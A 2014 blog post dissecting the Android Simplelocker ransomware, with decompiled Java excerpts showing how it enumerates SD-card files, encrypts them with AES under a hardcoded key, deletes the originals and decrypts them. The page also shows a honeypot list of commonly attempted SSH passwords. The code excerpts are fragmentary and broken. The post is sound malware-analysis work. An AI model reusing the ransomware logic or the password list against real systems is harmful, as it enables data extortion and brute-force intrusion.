Secure Honey

SSH honeypot written in C

How To Dissect Android Simplelocker Ransomware

Monday 16th June 2014 11:56

In this blog post we'll be looking at a new type of malware for Android phones that encrypts important files and demands the user pay a ransom to regain access to their phone.

This is the first reported case of ransomware being used on smartphones so I'm keen to find out more about this new malicious app.

I want to understand what this ransomware does and how it restricts the phone user from accessing files on their SD card. I'll be providing a step-by-step dissection of the malware to provide a clear explanation of how this app carries out its malicious activities.

So before we start the dissection let's look at exactly what Simplelocker is and where it came from.

What is Simplelocker?

First reported by Eset (ESET Analyzes First Android File-Encrypting, TOR-enabled Ransomware) on the 4th June 2014, Simplelocker has one goal: to encrypt certain files on the phone's SD card and then demand cash to decrypt the data - also known as ransomware.

Ransomware is a type of malware that "restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed" (see Wikipedia: Ransomware).

We've seen plenty of cases recently of ransomware infecting computer's (such as CryptoLocker and Cryptowall) but this appears to be the first case of smartphone ransomware in action.

Credit to the following articles for their explanation of the Simplelocker ransomware:

Simple Locker Ransomware Dissection

MD5: fd694cf5ca1dd4967ad6e8c67241114c
SHA256: 8a918c3aa53ccd89aaa102a235def5dcffa047e75097c1ded2dd2363bae7cf97
APK obtained from:

This post will follow a similar form to the previous post How To Dissect Android Flappy Bird Malware, only I'll assume you've already installed the various tools required for dissection.

The tools I'll be using for this dissection are the same as the previous dissection:

For this dissection I'll still be using dynamic and static analysis, but the approach will be slightly different.

Due to the dangerous nature of ransomware it could be risky to carry out the dynamic analysis first, just in case the ransomware does something malicious to the computer. So I'll be carrying out a basic static analysis in order to determine what the app does and if it's safe to run in a virtual environment, before carrying out the dynamic analysis. I'll then return to the static analysis where we'll look at the code in greater detail and how it carries out the malicious activities.

Basic Static Analysis

The first task is to turn the APK file into a .jar file which we can then open in JD-GUI to see the Java code that's powering the ransomware.

Heading over to the console, we first want to use the tool dex2jar to convert the APK file into a .jar file. The following command should do the trick:

sh /home/user/dex2jar-version/ /home/user/simplocker.apk

This should produce a .jar file which you can open in JD-GUI, producing something similar to the screenshot below:

Let's take a brief look at what this app is doing by exploring some of the class files:

In a nutshell this information tells us the following:

  1. This app is looking for images, documents and videos to encrypt. After encrypting the files it will then rename their file extensions to .enc
  2. The app has a C&C (command and control) server on the TOR network
  3. The app collects information about the phone (IMEI, OS, phone model, manufacturer) to send to C&C server
  4. Presumably the C&C server can send decryption instructions to the app

We now have a good overall picture of how this app carries out its ransomware activities. We can also determine that's it's reasonably safe to open this app in the virtual Android environment on DroidBox, so let's move onto the next phase.

Dynamic Analysis

In this phase we want to allow the app to run in a safe environment to confirm whether or not our suspicions from the basic static analysis phase are true.

The main tool we'll use for this phase is DroidDox (refer to the previous post, How To Dissect Android Flappy Bird Malware, for installation instructions)

We'll be working on the command line for this part. Also, remember to export the Android SDK path so we can work from any directory and still have access to the SDK tools:

export PATH=$PATH:/path/to/android-sdk/tools/
export PATH=$PATH:/path/to/android-sdk/platform-tools/

Make sure you have a virtual device setup and ready to deploy in the Android Virtual Device (AVD) manager by entering the command:


Heading over to the DroidBox directory, we can now start the Android emulator by entering the following command:

./ <AVD name>

Which should open up the virtual Android device with the OS loading, as seen in the screenshot below:

The Android emulator might take a minute or two to fire-up. Once it's ready, enter the following into the command line. This will install Simplelocker onto the virtual device and run the app:

./ simplelocker.apk

Once the app has installed, the virtual Android screen should look like the screenshot below:

This screenshot is the Simplelocker lock screen presented to the user. The text translates from Russian as follows:

WARNING your phone is locked!

The device is locked for viewing and distribution child pornography , zoophilia and other perversions.

To unlock you need to pay 260 UAH.

1. Locate the nearest payment kiosk.

2. Select MoneXy

3. Enter 380982049193.

4. Make deposit of 260 Hryvnia, and then press pay.

Do not forget to take a receipt!

After payment your device will be unlocked within 24 hours.

In case of no PAYMENT YOU WILL LOSE ALL DATA ON your device!

Interestingly, the code to enter (in step 3) appears to be the same every time the app is executed.

Heading back to the command line, DroidBox should have produced an output similar to the screenshot below:

Go ahead and press Ctrl-C to to view the JSON log of data collected while the app was running.

This log shows the use of localhost port 9051 being used for sending and receiving data, the app also accesses a lot of files.

This output didn't prove much because there's no SD card attached to the virtual Android device and therefore no files to encrypt. So let's carry out the experiment again, but this time with some files to be encrypted.

Head back to the AVD manager by entering the command Android on the command line. Open up the settings for the AVD being used for the experiment and enable the SD card with a size of 30 MiB.

The location of this SD card image should be ~/.android/avd//sdcard.img, so the virtual SD card can be mounted by using the following command

mount ~/.android/avd/sdcard.img -o loop /mnt/sdcard

At this point go ahead and copy onto the mounted virtual SD card some sample images ("jpeg", "jpg", "png", "bmp", "gif"), documents ("pdf", "doc", "docx", "txt") and videos ("avi", "mkv", "3gp", "mp4").

Once there are some sample files on the virtual SD card, unmount it by entering the following onto the command line:

umount /mnt/sdcard/

Now we're ready to fire up the AVD and run the app in DroidBox again:

./ <AVD name>
./ simplelocker.apk

It might take the AVD a while to encrypt all the files, but after a few minutes stop the AVD and mount the virtual SD card again. All the sample files should have been encrypted and had their extensions renamed to .enc.

So at this point we can confirm that our basic static analysis turned out to be correct: this app encrypts images, documents and videos with pre-determined file extensions.

Static Analysis - Part Two

Having determined what this app does, let's find out how this app carries out its malicious activities by looking at its code in more detail.

The main function being carried out by this app is the file encryption which occurs in the classes FilesEncryptor and AesCrypt. The class FilesEncryptor contains a method called getFileNames():

private void getFileNames(File paramFile)
    File[] arrayOfFile = paramFile.listFiles();
    int i = 0;
    if (i >= arrayOfFile.length)
    File localFile = new File(paramFile.getAbsolutePath(), arrayOfFile[i].getName());
    if ((localFile.isDirectory()) && (localFile.listFiles() != null))
    while (true)
      String str1 = localFile.getAbsolutePath();
      String str2 = str1.substring(1 + str1.lastIndexOf("."));
      if (this.extensionsToDecrypt.contains(str2))
      if (!Constants.EXTENSIONS_TO_ENCRYPT.contains(str2))

This code extract from the ransomware iterates through all files on the SD card. Line 15 calculates the file extension of each file on the SD card and then line 16 checks if the file extension is in the list of pre-determined file extensions to encrypt (found in the class Constants).

The same class also contains a method called encrypt():

  public void encrypt()
    throws Exception
    AesCrypt localAesCrypt;
    Iterator localIterator;
    if ((!this.settings.getBoolean("FILES_WAS_ENCRYPTED", false)) && (isExternalStorageWritable()))
      localAesCrypt = new AesCrypt("jndlasf074hr");
      localIterator = this.filesToEncrypt.iterator();
    while (true)
      if (!localIterator.hasNext())
        Utils.putBooleanValue(this.settings, "FILES_WAS_ENCRYPTED", true);
      String str = (String);
      localAesCrypt.encrypt(str, str + ".enc");
      new File(str).delete();

This method iterates over all the files which were added to the array in the previous method (getFileNames()), as seen on line 9. Each file is encrypted on line 19 where a call is made to the encrypt() method of the AesCrypt class.

The encrypt() method from the AesCrypt class requires two parameters: name/location of file to be encrypted and name/location of the encrypted output file. Line 19 uses the name of the file (as determined by line 18) and then appends the extension .enc to the end of the file to write. Finally, line 20 deletes the original unencrypted file.

The class AesCrypt carries out the actual encryption and decryption of files. It's constructor method is shown below:

  public AesCrypt(String paramString)
    throws Exception
    MessageDigest localMessageDigest = MessageDigest.getInstance("SHA-256");
    byte[] arrayOfByte = new byte[32];
    System.arraycopy(localMessageDigest.digest(), 0, arrayOfByte, 0, arrayOfByte.length);
    this.cipher = Cipher.getInstance("AES/CBC/PKCS7Padding");
    this.key = new SecretKeySpec(arrayOfByte, "AES");
    this.spec = getIV();

This code snipped shows that the ransomware uses AES encryption using AES/CBC/PKCS7Padding.

The AesCrypt class contains a method called crypt() (as called earlier in FilesEncryptor's encrypt() method), this method is shown below:

  public void encrypt(String paramString1, String paramString2)
    throws Exception
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(1, this.key, this.spec);
    CipherOutputStream localCipherOutputStream = new CipherOutputStream(localFileOutputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
      int i =;
      if (i == -1)
      localCipherOutputStream.write(arrayOfByte, 0, i);

This is where the file encryption takes places within the app. Lines 4 and 5 create variables used for the file input and output. Line 6 initialises the cipher (to encrypt data). Line 7 is where the encryption occurs and line 19 writes the encrypted byes to the output file.

Interestingly the same class also contains a method called decrypt() which is very similar to the encrypt() method:

  public void decrypt(String paramString1, String paramString2)
    throws Exception
    FileInputStream localFileInputStream = new FileInputStream(paramString1);
    FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
    this.cipher.init(2, this.key, this.spec);
    CipherInputStream localCipherInputStream = new CipherInputStream(localFileInputStream, this.cipher);
    byte[] arrayOfByte = new byte[8];
    while (true)
      int i =;
      if (i == -1)
      localFileOutputStream.write(arrayOfByte, 0, i);

Obviously this method carries out the decryption on the input file and produces the decrypted output file. The same line numbers from the encrypt() method are highlighted to demonstrate how decryption occurs.


As previously noted by other write-ups about this ransomware: this is more of a proof-of-concept app at the moment and it has yet to be discovered on the Google Play Store. The app is also quite simple to reverse-engineer and no code obfuscation has been used.

This dissection shows how the app encrypts user's files and that information about the phone is sent to a C&C server on the TOR network.

But one important question remains unanswered: would it be possible to decrypt files that have been encrypted by the app without connecting to the C&C server? In other words: can we reverse the damage done by this app?

In the next blog post we'll look at how you can create an antidote for this ransomware.

Edit: as promised, a complete walkthrough on creating the antidote for Simplelocker (which will decrypt the files) is available in the blog post Creating An Antidote For Android Simplelocker Ransomware.

Image credit: "Google Android Amigurumi" by Kham Tran,



Tue, 17 Jun 2014 02:34:49 +0100

Awesome work!


Tue, 17 Jun 2014 12:41:10 +0100

damn! awesome work dude! I've never read such a detailed explanation anywhere! keep up the good work! looking forward to more articles!


Fri, 20 Jun 2014 13:34:39 +0100

I wrote decoder at 9 June =) LOL for Russia

Add Comment


Email (won't be displayed)

Website (optional)


Live Stats (see full stats)

Attempted logins

date range # attempts
past 7 days4,426
past 30 days17,357
all time4,114,040

Top 5 passwords

password # attempts

Top 5 usernames

username # attempts

Stats represent data collected from SSH login attempts on multiple honeypots. Parts of some stats may be filtered to maintain anonymity.

Updated: Tue, 07 Jun 2016 16:33:48 +0100

Live Password Cloud

12qwaszx 963852741 1234%^ POIUYT 12344321 zxcvbn 111 zaqxsw 888888 111111 asdfghjkl a123456 windows qwer1234 q1w2e3 Passw0rd zxcv support 1111 server iloveyou welcome123 user !@ abcdef a cisco 123abc qwer qwerty123 q123456 manager 54321 alpine qq123456 huawei 11223344 password zaqxswcde qazwsx default 1 qwe123 test okokok 88888888 ubnt dragon 159753 147852369 12345678 passwd qwertyuiop 23456 power qwaszx huawei123 changeme123 123123123 5201314 Aa123456 qwe 1qazxsw2 nagios redhat zaqxswcdevfr q1w2e3r4 1234qwer 1qaz2wsx3edc monitor 12345 pass root1234 password123 123qweasd 000000 z1x2c3v4 qaz qazwsx123 f**kyou admin123!@# Pass123 121212 p@ssword 1a2s3d4f 1qaz2wsx Admin123456 woaini zaq1xsw2 linux adminadmin _ system 1qaz@WSX P@ssw0rd1 sapp a1b2c3d4 654321 qazwsxedc 1234 sqlpp qazxsw asdf sysadmin qqpp abc123 idc2008 123123 666666 123456 123qwe 987654321 admin123 admin@123 zhang 789789 11111111 idcidc qwerty123456 secret Huawei@123 !@#$%^ changeme 1q2w3e 147258369 superman 147258 admin1 mnbvcxz admin welcome 225588 !qaz1QAZ 123 p0o9i8u7 apple aaa !QAZ2wsx administrator zzzzzz oracle qwerty china 0000 rootpass 7890pp letmein abcd1234 1122334455 raspberry abc1234 a1s2d3f4 rootroot P@ssw0rd qwert public adminpp 1q2w3e4r5t root 1234567890 qweasd guest asdfgh test123 zxcvbnm caonima - !QAZ@WSX 112233 147147 123654 q1w2e3r4t5 1234567 1q2w3e4r password1 root123 123456789 12345qwert qweasdzxc 110110 159357